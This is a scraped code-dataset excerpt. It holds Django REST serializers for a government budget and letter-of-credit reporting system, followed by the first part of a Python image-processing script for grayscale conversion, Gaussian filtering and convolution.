BillSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to fetch token number,bill number and detail.\n \"\"\"\n\n token_number = serializers.IntegerField(source=\"bill_pass.token.number\")\n bill_number = serializers.CharField(source=\"bill_pass.token.bill.number\")\n date = serializers.DateTimeField(source=\"created_at\", format=\"%d-%m-%Y\")\n\n class Meta:\n model = PCBillClassification\n fields = (\"token_number\", \"bill_number\", \"amount\", \"date\")\n\n\nclass TEClassificationSerializers(serializers.ModelSerializer):\n number = serializers.IntegerField(source=\"te.number\")\n description = serializers.CharField(source=\"te.remark\")\n te_date = serializers.DateField(source=\"te.date\", format=\"%d-%m-%Y\")\n\n class Meta:\n model = TEClassification\n fields = (\"te_date\", \"number\", \"description\", \"amount\", \"operation\")\n\n\nclass MilestoneScrollSerializer(serializers.ModelSerializer):\n date_scroll = serializers.DateTimeField(source=\"date\", format=\"%d-%m-%Y\")\n number = serializers.CharField(source=\"milestone.lc_detail.lc_number\")\n\n class Meta:\n model = MileStoneScroll\n fields = (\"number\", \"description\", \"amount\", \"date_scroll\")\n\n\nclass ReceiptScrollClassificationSerializers(serializers.ModelSerializer):\n challan_number = serializers.CharField(source=\"challan.number\")\n challan_date = serializers.DateField(source=\"challan.date\", format=\"%d-%m-%Y\")\n amount = serializers.DecimalField(\n max_digits=19, decimal_places=2, source=\"challan.amount\"\n )\n source = serializers.CharField(source=\"challan.source\")\n\n class Meta:\n model = ReceiptScrollClassification\n fields = 
(\"challan_date\", \"challan_number\", \"amount\", \"source\")\n\n\nclass ExpenditureControlRegisterSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer created to validate expenditure control on ddo master and short code mapping detail.\n \"\"\"\n\n function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_head_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.objects_heads.description\"\n )\n sub_head_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.sub_head.description\",\n required=False,\n )\n short_code = serializers.CharField(source=\"short_code_mapping.short_codes\")\n ddo_code = serializers.CharField(source=\"ddo_master.public_id\")\n ddo_description = serializers.CharField(source=\"ddo_master.description\")\n cat_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.code\"\n )\n cat_type = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.type\"\n )\n bill_pass_entry = serializers.SerializerMethodField(\"get_bill_pass\")\n transfer_entry = serializers.SerializerMethodField(\"get_transfer_entry\")\n vr_challan_entry = serializers.SerializerMethodField(\"get_vr_challan_entry\")\n letter_credit_entry = serializers.SerializerMethodField(\"get_scroll_detail\")\n total_budget = serializers.DecimalField(\n decimal_places=2, max_digits=19, source=\"total_amount\"\n )\n total_expenditure = serializers.SerializerMethodField(\"get_total_expenditure\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\n \"total_budget\",\n \"total_expenditure\",\n \"function_head\",\n \"object_head_code\",\n \"sub_head_code\",\n \"short_code\",\n \"ddo_code\",\n \"ddo_description\",\n \"cat_code\",\n \"cat_type\",\n \"bill_pass_entry\",\n \"transfer_entry\",\n \"vr_challan_entry\",\n \"letter_credit_entry\",\n \"financial_year\",\n )\n\n def get_total_expenditure(self, inst):\n params = self.context\n short_code_id = inst.short_code_mapping.public_id\n ddo_id = inst.ddo_master.public_id\n return total_object_head_expenditure_ddo_wise([ddo_id], short_code_id, params)\n\n @staticmethod\n def get_bill_pass(inst):\n return BillSerializer(\n PCBillClassification.objects.filter(\n short_code__public_id=inst.short_code_mapping.public_id,\n bill_pass__ddo_code__public_id=inst.ddo_master.public_id,\n bill_pass__cheque_on_bill_pass__cheque__isnull=False,\n )\n .distinct()\n .order_by(\"bill_pass__token__number\"),\n many=True,\n ).data\n\n @staticmethod\n def get_transfer_entry(inst):\n return TEClassificationSerializers(\n TEClassification.objects.filter(\n ddo__public_id=inst.ddo_master.public_id,\n short_code__public_id=inst.short_code_mapping.public_id,\n ).filter(\n te__id__in=TransferEntry.objects.filter(\n status_on_te__in=TEStatus.objects.filter(\n status=\"Pass\", user_type=\"AAO\"\n )\n )\n ),\n many=True,\n ).data\n\n @staticmethod\n def get_scroll_detail(inst):\n return MilestoneScrollSerializer(\n MileStoneScroll.objects.filter(\n milestone__lc_detail__lc_authorization_request__in=LCAuthorizationRequest.objects.filter(\n short_code__public_id=inst.short_code_mapping.public_id\n ),\n milestone__lc_detail__lc_authorization_request__ddo_master__public_id=inst.ddo_master.public_id,\n lc_milestone_on_payment_scroll__in=PaymentClassificationScroll.objects.filter(),\n ),\n many=True,\n ).data\n\n @staticmethod\n def get_vr_challan_entry(inst):\n short_code_id = 
inst.short_code_mapping.public_id\n ddo_id = inst.ddo_master.public_id\n return ReceiptScrollClassificationSerializers(\n ReceiptScrollClassification.objects.filter(\n scroll__status_on_receipt_scroll__in=ReceiptScrollStatus.objects.filter(\n # user_type=\"AAO\",\n status=\"Pass\",\n scroll__classification_on_receipt_scroll__challan__in=Challan.objects.filter(\n ddo__public_id=ddo_id,\n classification_on_challan__short_code__public_id=short_code_id,\n ),\n ),\n ),\n many=True,\n ).data\n\n\nclass BillDetailSerializer(serializers.ModelSerializer):\n token = serializers.IntegerField(source=\"bill_pass.token.number\")\n voucher = serializers.IntegerField(source=\"bill_pass.token.voucher.number\")\n bill_date = serializers.DateField(\n source=\"bill_pass.token.bill.date\", format=\"%d-%m-%Y\"\n )\n bill_number = serializers.CharField(source=\"bill_pass.token.bill.number\")\n bill_amount = serializers.DecimalField(\n max_digits=19, decimal_places=2, source=\"bill_pass.token.bill.amount\"\n )\n cheque_number = serializers.CharField(source=\"cheque.number\")\n\n class Meta:\n model = PCChequeDetail\n fields = (\n \"token\",\n \"voucher\",\n \"bill_number\",\n \"bill_date\",\n \"bill_amount\",\n \"cheque_number\",\n \"amount\",\n )\n\n\nclass BudgetOverridingParamsSerializer(serializers.Serializer):\n \"\"\"\n This serializer is used to provide budget override detail.\n \"\"\"\n\n financial_year = serializers.CharField()\n start_date = serializers.DateField()\n end_date = serializers.DateField()\n\n\nclass EntryRegisterSerializer(serializers.ModelSerializer):\n \"\"\"\n \"\"\"\n\n ddo_code = serializers.CharField(source=\"ddo.code\")\n ddo_description = serializers.CharField(source=\"ddo.code\")\n\n class Meta:\n model = Entry\n fields = (\n \"ddo_code\",\n \"ddo_description\",\n \"amount\",\n \"remark\",\n )\n\n\nclass EntryParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created to validate ddo budget detail.\n \"\"\"\n\n ddo_id = serializers.IntegerField(source=\"ddo__public_id\")\n short_code_mapping_id = serializers.IntegerField(\n source=\"short_code__short_code_mapping__public_id\"\n )\n\n class Meta:\n model = Entry\n fields = (\"ddo_id\", \"short_code_mapping_id\")\n\n\nclass AuthorizationRegisterParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer created to provide shortcode mapping and ddo master detail of lc auth budget.\n \"\"\"\n\n financial_year = serializers.CharField()\n short_code_mapping_id = serializers.CharField(\n source=\"short_code_mapping__public_id\"\n )\n ddo_master_id = serializers.IntegerField(source=\"ddo_master__public_id\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\"financial_year\", \"short_code_mapping_id\", \"ddo_master_id\")\n\n\nclass LCAuthorizationBudgetParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer created to provide shortcode mapping and ddo master detail of lc auth budget.\n \"\"\"\n\n financial_year = serializers.CharField()\n short_code_mapping_id = serializers.CharField(\n source=\"short_code_mapping__public_id\"\n )\n ddo_master_id = serializers.IntegerField(source=\"ddo_master__public_id\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\"financial_year\", \"short_code_mapping_id\", \"ddo_master_id\")\n\n\nclass LCAuthorizationBudgetSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to get list of lc auth detail for budget.\n \"\"\"\n\n grant_number = serializers.IntegerField(\n source=\"short_code_mapping.grant_master.number\"\n )\n 
function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.objects_heads.object_code\"\n )\n category_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.code\"\n )\n category_description = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.description\"\n )\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = [\n \"grant_number\",\n \"function_head\",\n \"object_code\",\n \"category_code\",\n \"category_description\",\n \"total_amount\",\n \"ddo_code\",\n ]\n\n\nclass ALLDDOWiseAllocationReportParams(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to validate list of all ddo wise allocation.\n \"\"\"\n\n financial_year = serializers.CharField()\n ddo_master_id = serializers.IntegerField(\n source=\"short_code_budget__short_code__ddo_master__public_id\"\n )\n short_code_id = serializers.IntegerField(\n source=\"short_code_budget__short_code__public_id\"\n )\n\n class Meta:\n model = ShortCodeBudgetAllocation\n fields = (\n \"financial_year\",\n \"ddo_master_id\",\n \"short_code_id\",\n \"budget_type\",\n )\n\n\nclass ALLDDOAllocationsDetailSerializer(serializers.ModelSerializer):\n public_id = serializers.IntegerField(required=False)\n allocation_number = serializers.IntegerField(required=False)\n ddo_code = serializers.CharField(\n source=\"ddo_wise_allocation.ddo_master.code\", required=False\n )\n ddo_description = serializers.CharField(\n source=\"ddo_wise_allocation.ddo_master.description\", required=False\n )\n letter_date = serializers.DateField(format=\"%d-%m-%Y\")\n\n class Meta:\n model = AllocationsDetail\n fields = (\n \"public_id\",\n \"ddo_code\",\n \"ddo_description\",\n \"amount\",\n \"letter_no\",\n \"allocation_number\",\n \"letter_date\",\n \"budget_type\",\n )\n\n\nclass ALLDDOWiseAllocationReportSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to validate list of all ddo wise allocation.\n \"\"\"\n\n short_code_mapping = serializers.CharField(\n source=\"short_code_budget.short_code.short_codes\"\n )\n grant_number = serializers.CharField(source=\"short_code_budget.grant.number\")\n allocation_detail = serializers.SerializerMethodField(\"get_allocation_detail\")\n total_ddo_allocation_amount = serializers.SerializerMethodField(\"get_total_balance\")\n short_code_balance = serializers.DecimalField(\n source=\"amount\", max_digits=19, decimal_places=2\n )\n\n class Meta:\n model = ShortCodeBudgetAllocation\n fields = (\n \"short_code_mapping\",\n \"grant_number\",\n \"short_code_balance\",\n \"budget_type\",\n \"total_ddo_allocation_amount\",\n \"allocation_detail\",\n )\n\n @staticmethod\n def get_allocation_detail(inst):\n return ALLDDOAllocationsDetailSerializer(\n AllocationsDetail.objects.filter(\n short_code_budget_allocation=inst,\n ).exclude(budget_type=\"Transfer\"),\n many=True,\n ).data\n\n @staticmethod\n def get_total_balance(inst):\n return (\n AllocationsDetail.objects.filter(short_code_budget_allocation=inst)\n .exclude(budget_type=\"Transfer\")\n .aggregate(total_amount=Sum(\"amount\"))[\"total_amount\"]\n )\n\n\nclass DDOWiseAllocationReportSerializer(serializers.ModelSerializer):\n short_code_mapping = serializers.CharField(source=\"short_code_mapping.short_codes\")\n short_code_mapping_id = 
serializers.CharField(source=\"short_code_mapping.public_id\")\n ddo_master_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_master_code_id = serializers.CharField(source=\"ddo_master.public_id\")\n ddo_master_description = serializers.CharField(source=\"ddo_master.description\")\n allocation_detail = serializers.SerializerMethodField(\"get_allocation_detail\")\n grant_number = serializers.SerializerMethodField(\"get_grant_number\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\n \"short_code_mapping\",\n \"short_code_mapping_id\",\n \"ddo_master_code_id\",\n \"ddo_master_code\",\n \"ddo_master_description\",\n \"grant_number\",\n \"allocation_detail\",\n )\n\n @staticmethod\n def get_allocation_detail(inst):\n return AllocationsDetailSerializer(\n AllocationsDetail.objects.filter(ddo_wise_allocation=inst), many=True\n ).data\n\n @staticmethod\n def get_grant_number(inst):\n return inst.short_code_mapping.budget_on_short_code.filter().last().grant.number\n\n\nclass LCAmountVariationRemarkSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code and detail.\n \"\"\"\n\n class Meta:\n model = LCAmountVariationRemark\n fields = (\"amount\", \"remark\", \"percent_variation\")\n\n\nclass DetailLCSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to get list of all variation code.\n \"\"\"\n\n lc_date = serializers.DateField(format=\"%d-%m-%Y\")\n\n class Meta:\n model = LCDetail\n fields = [\"lc_number\", \"lc_date\", \"lc_from_period\", \"lc_to_period\"]\n\n\nclass MileStoneScrollSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code.\n \"\"\"\n\n scroll_date = serializers.DateTimeField(source=\"date\", format=\"%d-%m-%Y\")\n credit_by_detail = serializers.CharField(\n source=\"credit_by.function_head\", required=False\n )\n\n class Meta:\n model = MileStoneScroll\n fields = (\"amount\", \"description\", \"scroll_date\", \"credit_by_detail\")\n\n\nclass MileStoneSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code.\n \"\"\"\n\n milestone_date = serializers.DateTimeField(source=\"date\", format=\"%d-%m-%Y\")\n\n scroll_detail = serializers.SerializerMethodField(\"get_scroll_detail\")\n\n class Meta:\n model = MileStone\n fields = (\"amount\", \"description\", \"milestone_date\", \"scroll_detail\")\n\n @staticmethod\n def get_scroll_detail(inst):\n return MileStoneScrollSerializer(\n inst.scroll_on_milestone.filter(), many=True\n ).data\n\n\nclass AccountSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code.\n \"\"\"\n\n function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.objects_heads.description\"\n )\n sub_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.sub_head.description\",\n required=False,\n )\n category_description = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.description\"\n )\n short_codes = serializers.CharField(source=\"short_code_mapping.short_codes\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\n \"function_head\",\n \"object_code\",\n \"sub_code\",\n \"short_codes\",\n \"category_description\",\n )\n\n\nclass 
AuthorizationBudgetLCSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all lc auth register detail for budget.\n \"\"\"\n\n letter_date = serializers.DateField(source=\"date\", format=\"%d-%m-%Y\")\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_description = serializers.CharField(source=\"ddo_master.code\")\n bank_code = serializers.CharField(source=\"bank.bank_code\")\n bank_type = serializers.CharField(source=\"bank.bank_type\")\n branch_code = serializers.CharField(source=\"branch.code\")\n branch_description = serializers.CharField(source=\"branch.branch_description\")\n # account_detail = serializers.SerializerMethodField(\"get_account_detail\")\n lcDetail = serializers.SerializerMethodField(\"get_lc_detail\")\n lcAmountVariationRemark = serializers.SerializerMethodField(\n \"get_amount_variation_remark\"\n )\n mile_stone_detail = serializers.SerializerMethodField(\"get_mile_stone\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\n \"ddo_code\",\n \"ddo_description\",\n \"auth_letter_no\",\n \"letter_date\",\n \"bank_code\",\n \"bank_type\",\n \"branch_code\",\n \"branch_description\",\n \"lc_type\",\n # \"account_detail\",\n \"lcDetail\",\n \"lcAmountVariationRemark\",\n \"mile_stone_detail\",\n )\n\n @staticmethod\n def get_account_detail(inst):\n return AccountSerializer(inst.ddo_wise_allocation).data\n\n @staticmethod\n def get_lc_detail(inst):\n return DetailLCSerializer(\n inst.lc_detail_on_lc_auth_request.filter().last()\n ).data\n\n @staticmethod\n def get_amount_variation_remark(inst):\n return LCAmountVariationRemarkSerializer(\n inst.lc_amount_variation_on_lc_auth_request.filter().last(),\n ).data\n\n @staticmethod\n def get_mile_stone(inst):\n return MileStoneSerializer(\n inst.lc_detail_on_lc_auth_request.get().milestone_on_lc_detail.filter(),\n many=True,\n ).data\n\n\nclass PaoLevelBudgetAllocationSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to provide budget allocation on PAO level.\n \"\"\"\n\n pao_id = serializers.IntegerField(source=\"pao.public_id\")\n pao_code = serializers.CharField(source=\"pao.code\")\n pao_description = serializers.CharField(source=\"pao.description\")\n grant_id = serializers.IntegerField(source=\"grant.public_id\")\n grant_number = serializers.CharField(source=\"grant.number\")\n grant_description = serializers.CharField(source=\"grant.description\")\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n\n class Meta:\n model = PaoBudget\n fields = (\n \"pao_id\",\n \"pao_code\",\n \"pao_description\",\n \"grant_id\",\n \"grant_number\",\n \"grant_description\",\n \"allocation\",\n \"financial_year\",\n )\n\n @staticmethod\n def get_allocation(inst):\n data = inst.allocation_on_pao_budget.all()\n return BudgetAllocationDetailSerializer(\n (\n data.filter(budget_type__istartswith=\"BE\").last(),\n data.filter(budget_type__istartswith=\"RE\").last(),\n data.filter(budget_type__istartswith=\"FE\").last(),\n ),\n many=True,\n ).data\n\n\nclass DDOWiseBudgetAllocationAndBalanceParams(serializers.Serializer):\n \"\"\"\n This serializer is created to validate expenditure detail on ddo for the month.\n \"\"\"\n\n financial_year = serializers.CharField()\n ddo_id = serializers.IntegerField(required=False)\n grant_master_id = serializers.IntegerField()\n start_date = serializers.DateField(required=False)\n end_date = serializers.DateField(required=False)\n\n\nclass SubHeadMasterDetailsSerializers(serializers.ModelSerializer):\n\n 
budget_allocation_detail = serializers.SerializerMethodField(\n \"get_budget_allocation\"\n )\n\n class Meta:\n model = SubHead\n fields = (\"description\", \"budget_allocation_detail\")\n\n def get_budget_allocation(self, inst):\n params = self.context\n ddo = params.get(\"ddo_id\")\n short_code_mapping = ShortCodeMapping.objects.filter(\n functional_head_matrix__sub_head=inst\n )\n if short_code_mapping:\n short_code_mapping_id = short_code_mapping.last().public_id\n else:\n return {\"Message\": \"Short_Code_Not_Exists\"}\n if ddo:\n return head_wise_ddo_wise_budget_allocation_and_balance(\n ddo, short_code_mapping_id, params\n )\n else:\n return get_object_head_allocation_detail(short_code_mapping_id)\n\n\nclass ObjectHeadMasterDetailSerializers(serializers.ModelSerializer):\n object_head_code = serializers.CharField(source=\"object_code\")\n object_head_description = serializers.CharField(source=\"description\")\n category = serializers.CharField(\n source=\"matrix_on_object_head__category_master__code\"\n )\n budget_allocation_detail = serializers.SerializerMethodField(\"get_sub_head_detail\")\n\n class Meta:\n model = ObjectHeadMaster\n fields = (\n \"object_head_code\",\n \"object_head_description\",\n \"category\",\n \"budget_allocation_detail\",\n )\n\n def get_sub_head_detail(self, inst):\n params = self.context\n function_head = params.get(\"function_head_inst\")\n ddo = params.get(\"ddo_id\")\n short_code_mapping = get_short_code(inst, function_head)\n if short_code_mapping:\n short_code_mapping_id = short_code_mapping.last().public_id\n else:\n return {\"Message\": \"Short_Code_Not_Exists\"}\n sub__head_inst = get_sub_head(inst)\n if ddo:\n if sub__head_inst:\n return SubHeadMasterDetailsSerializers(\n sub__head_inst, context=params, many=True\n ).data\n else:\n return head_wise_ddo_wise_budget_allocation_and_balance(\n ddo, short_code_mapping_id, params\n )\n else:\n if sub__head_inst:\n return SubHeadMasterDetailsSerializers(\n sub__head_inst, context=params, many=True\n ).data\n return get_object_head_allocation_detail(short_code_mapping_id)\n # data.append({\"object_head\": \"True\"})\n # return data\n\n\nclass FunctionalHeadMasterDetailSerializers(serializers.ModelSerializer):\n\n detail_code = serializers.CharField(source=\"detail.code\")\n detail_description = serializers.CharField(source=\"detail.description\")\n object_head_detail = serializers.SerializerMethodField(\"get_object_head_detail\")\n\n class Meta:\n model = FunctionalHeadMaster\n fields = (\"detail_code\", \"detail_description\", \"object_head_detail\")\n\n def get_object_head_detail(self, inst):\n params = self.context\n params[\"function_head_inst\"] = inst\n return ObjectHeadMasterDetailSerializers(\n get_object_head(inst), many=True, context=params,\n ).data\n\n\nclass TransferBudgetDDOWiseParams(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to validate transfer budget by ddo wise.\n \"\"\"\n\n financial_year = serializers.CharField()\n start_date = serializers.DateField()\n end_date = serializers.DateField()\n\n class Meta:\n model = TransferBudget\n fields = (\"financial_year\", \"start_date\", \"end_date\")\n\n\nclass TransferBudgetDDOWiseSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to validate transfer budget ddo wise.\n \"\"\"\n\n from_allocation_short_code = serializers.CharField(\n source=\"from_allocation.short_code_mapping.short_codes\"\n )\n from_allocation_ddo_code = serializers.CharField(\n source=\"from_allocation.ddo_master.code\"\n )\n 
from_allocation_ddo_description = serializers.CharField(\n source=\"from_allocation.ddo_master.description\"\n )\n to_allocation_short_code = serializers.CharField(\n source=\"to_allocation.short_code_mapping.short_codes\"\n )\n to_allocation_ddo_code = serializers.CharField(\n source=\"to_allocation.ddo_master.code\"\n )\n to_allocation_ddo_description = serializers.CharField(\n source=\"to_allocation.ddo_master.description\"\n )\n date = serializers.DateTimeField(source=\"created_at\", format=\"%d-%m-%Y\")\n\n class Meta:\n model = TransferBudget\n fields = (\n \"date\",\n \"from_allocation_short_code\",\n \"from_allocation_ddo_code\",\n \"from_allocation_ddo_description\",\n \"to_allocation_short_code\",\n \"to_allocation_ddo_code\",\n \"to_allocation_ddo_description\",\n \"amount\",\n )\n\n\n# LC Serializer\nclass LcStatusParams(serializers.ModelSerializer):\n lc_date = serializers.CharField(source=\"date\")\n user_type = serializers.CharField(source=\"lc_status_on_lc_auth_request__user_type\")\n status = serializers.CharField(source=\"lc_status_on_lc_auth_request__status\")\n auth_letter_no = serializers.CharField(source=\"public_id\")\n ddo_id = serializers.CharField(source=\"ddo_master__public_id\")\n ddo_description = serializers.CharField(source=\"ddo_master__description\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\n \"auth_letter_no\",\n \"lc_date\",\n \"ddo_id\",\n \"ddo_description\",\n \"user_type\",\n \"status\",\n )\n\n\nclass LCStatusSerializer(serializers.ModelSerializer):\n class Meta:\n model = LcAuthRequestStatus\n fields = (\n \"user_type\",\n \"status\",\n )\n\n\nclass LcStatusReportSerializer(serializers.ModelSerializer):\n lc_date = serializers.CharField(source=\"date\")\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_description = serializers.CharField(source=\"ddo_master.description\")\n short_code = serializers.CharField(source=\"short_code.short_codes\")\n lc_status = serializers.SerializerMethodField(\"get_lc_status\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\n \"auth_letter_no\",\n \"lc_date\",\n \"ddo_code\",\n \"ddo_description\",\n \"short_code\",\n \"lc_date\",\n \"lc_status\",\n )\n\n @staticmethod\n def get_lc_status(inst):\n return LCStatusSerializer(\n LcAuthRequestStatus.objects.filter(\n lc_auth_request__public_id=inst.public_id\n ),\n many=True,\n ).data\n\n\nclass LcUpdateReportParams(serializers.ModelSerializer):\n auth_letter_no = serializers.IntegerField(\n source=\"lc_authorization_request__public_id\"\n )\n lc_number = serializers.IntegerField(source=\"public_id\")\n\n class Meta:\n model = LCDetail\n fields = (\n \"auth_letter_no\",\n \"lc_number\",\n \"lc_date\",\n )\n\n\nclass LcUpdateReportSerializer(serializers.ModelSerializer):\n auth_letter_no = serializers.CharField(\n source=\"lc_authorization_request.auth_letter_no\"\n )\n lc_type = serializers.CharField(source=\"lc_authorization_request.lc_type\")\n ddo_code = serializers.CharField(source=\"lc_authorization_request.ddo_master.code\")\n ddo_description = serializers.CharField(\n source=\"lc_authorization_request.ddo_master.description\"\n )\n short_code = serializers.CharField(\n source=\"lc_authorization_request.short_code.short_codes\"\n )\n\n class Meta:\n model = LCDetail\n fields = (\n \"auth_letter_no\",\n \"lc_number\",\n \"lc_date\",\n \"lc_from_period\",\n \"lc_to_period\",\n \"lc_type\",\n \"ddo_code\",\n \"ddo_description\",\n \"short_code\",\n )\n\n\n# class 
LcMiletoneScrollParams(serializers.ModelSerializer):\n# auth_letter_no = serializers.IntegerField(source=\"lc_detail__lc_authorization_request__public_id\")\n# lc_number = serializers.IntegerField(source=\"lc_detail__lc__public_id\")\n# lc_date = serializers.DateField(source=\"lc_detail__lc_date\")\n#\n# class Meta:\n# model = MileStone\n# fields = (\n# \"auth_letter_no\",\n# \"lc_number\",\n# \"lc_date\",\n# )\n\n\nclass ScrollSerializer(serializers.ModelSerializer):\n date = serializers.DateTimeField(format=\"%d-%m-%Y\")\n\n class Meta:\n model = MileStoneScroll\n fields = (\"description\", \"amount\", \"date\")\n\n\nclass LcMiletoneSerializer(serializers.ModelSerializer):\n scroll_details = serializers.SerializerMethodField(\"get_scroll_details\")\n\n class Meta:\n model = MileStone\n fields = (\"description\", \"amount\", \"date\", \"scroll_details\")\n\n @staticmethod\n def get_scroll_details(inst):\n return ScrollSerializer(\n MileStoneScroll.objects.filter(milestone=inst), many=True\n ).data\n\n\nclass LcMiletoneScrollSerializer(serializers.ModelSerializer):\n auth_letter_no = serializers.CharField(\n source=\"lc_authorization_request.auth_letter_no\"\n )\n mile_stone_details = serializers.SerializerMethodField(\"get_mile_stone_details\")\n\n class Meta:\n model = LCDetail\n fields = (\"auth_letter_no\", \"lc_number\", \"lc_date\", \"mile_stone_details\")\n\n @staticmethod\n def get_mile_stone_details(inst):\n return LcMiletoneSerializer(\n MileStone.objects.filter(lc_detail=inst), many=True\n ).data\n","repo_name":"pythonsvelte/pythonsvelte","sub_path":"reports/budget/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":46972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9461006140","text":"import numpy as np\r\nimport PIL\r\nimport math\r\nfrom regex import R\r\n#Converto in immagine bianco e nero\r\n\r\ndef RGB_TO_GRAY(Image):\r\n width = Image.shape[0]\r\n height = Image.shape[1]\r\n gray_image = np.zeros((Image.shape[0],Image.shape[1]))\r\n \r\n for x in range(0,width):\r\n for y in range(0,height):\r\n gray_image[x,y] = 0.299 * Image[x,y,0] + 0.587 * Image[x,y,1] + 0.114 * Image[x,y,2]\r\n \r\n gray_image = np.floor(gray_image)\r\n \r\n return gray_image \r\n\r\n#Resitituisce l'Immagine invertita di quella in scala di grigi \r\n\r\ndef Invert_Image(gray_image):\r\n width = gray_image.shape[0]\r\n height = gray_image.shape[1]\r\n inverted_image = np.zeros((gray_image.shape[0],gray_image.shape[1]))\r\n \r\n for x in range(0,width):\r\n for y in range(0,height):\r\n inverted_image[x,y] = 255 - gray_image[x,y]\r\n \r\n inverted_image = np.floor(inverted_image)\r\n \r\n return inverted_image\r\n\r\n\r\ndef clamped_pixel(Image,x,y,c):\r\n x = math.floor(x)\r\n y = math.floor(y)\r\n c = math.floor(c)\r\n if (x < 0):\r\n x = 0\r\n if (x >= Image.shape[0]):\r\n x = Image.shape[0] - 1\r\n if (y < 0):\r\n y = 0\r\n if (y >= Image.shape[1]):\r\n y = Image.shape[1] - 1\r\n if (c < 0):\r\n c = 0\r\n if (c >= Image.shape[2]):\r\n c = Image.shape[2] - 1 \r\n return int(Image[x,y,c])\r\n\r\ndef clamped_pixel_gray(Image,x,y):\r\n x = int(x)\r\n y = int(y)\r\n if (x < 0):\r\n x = 0\r\n if (x >= Image.shape[0]):\r\n x = Image.shape[0] - 1\r\n if (y < 0):\r\n y = 0\r\n if (y >= Image.shape[1]):\r\n y = Image.shape[1] - 1\r\n return Image[x,y]\r\n\r\n\r\n\r\ndef compute_gaussian(x,y,sigma):\r\n sigma2 = sigma*sigma\r\n return 1.0/(2*np.pi*sigma2)*np.exp(-(x*x+y*y)/(2*sigma2))\r\n\r\n\r\ndef 
l1_normalize(Image):\r\n somma = 0\r\n for i in range(0,Image.shape[0]):\r\n for j in range(0,Image.shape[1]):\r\n somma = somma + Image[i,j]\r\n for i in range(0,Image.shape[0]):\r\n for j in range(0,Image.shape[1]):\r\n Image[i,j] = Image[i,j] / somma\r\n return\r\n\r\n#Funzione che crea un filtro gaussiano\r\n\r\ndef Create_Gaussian_Filter(sigma):\r\n Range = int(sigma*3)\r\n size = Range * 2 + 1\r\n \r\n \r\n Filter = np.zeros((size,size))\r\n for l in range(0,size):\r\n for m in range(0,size):\r\n Filter[l,m] = compute_gaussian(l - Range, m - Range, sigma)\r\n \r\n l1_normalize(Filter)\r\n return Filter\r\n \r\n#Effettua convoluzione per immagini in gray scale\r\n\r\ndef convolve_gray_image(Image,Filter):\r\n filter_offset = math.floor(Filter.shape[0] / 2)\r\n Ret_Image = np.zeros(Image.shape)\r\n\r\n #Per ogni pixel dell'immagine\r\n for i in range(0,Image.shape[0]):\r\n for j in range(0,Image.shape[1]):\r\n somma = 0\r\n for l in range(-filter_offset,filter_offset+1):\r\n for m in range(-filter_offset,filter_offset+1):\r\n a = clamped_pixel_gray(Image, i-l, j-m)\r\n b = Filter[filter_offset-l,filter_offset-m]\r\n somma = somma + (a * b)\r\n Ret_Image[i,j] = somma\r\n return Ret_Image\r\n\r\n\r\ndef convolve_image_2(image,filter):\r\n\r\n retImage = np.zeros(image.shape) #Creo array da restituire in output\r\n \r\n filterSize = filter.shape[0] #Dimensione del filtro\r\n print(filterSize)\r\n filterOffset = math.floor(filterSize/2) #Dimensione metà filtro escluso il centro\r\n print(filterOffset)\r\n \r\n imageWithPadding = np.zeros((image.shape[0] + filterSize - 1, image.shape[1] + filterSize - 1)) #Aggiungo padding all'immagine dato in input per poter utilizzare il filtro sui pixel del bordo\r\n imageWithPadding[filterOffset:-filterOffset, filterOffset:-filterOffset] = image\r\n\r\n # Per ogni pixel dell'immagine\r\n for x in range(image.shape[1]):\r\n for y in range(image.shape[0]):\r\n #Effettuo il prodotto elemento per elemento delle 2 matrici 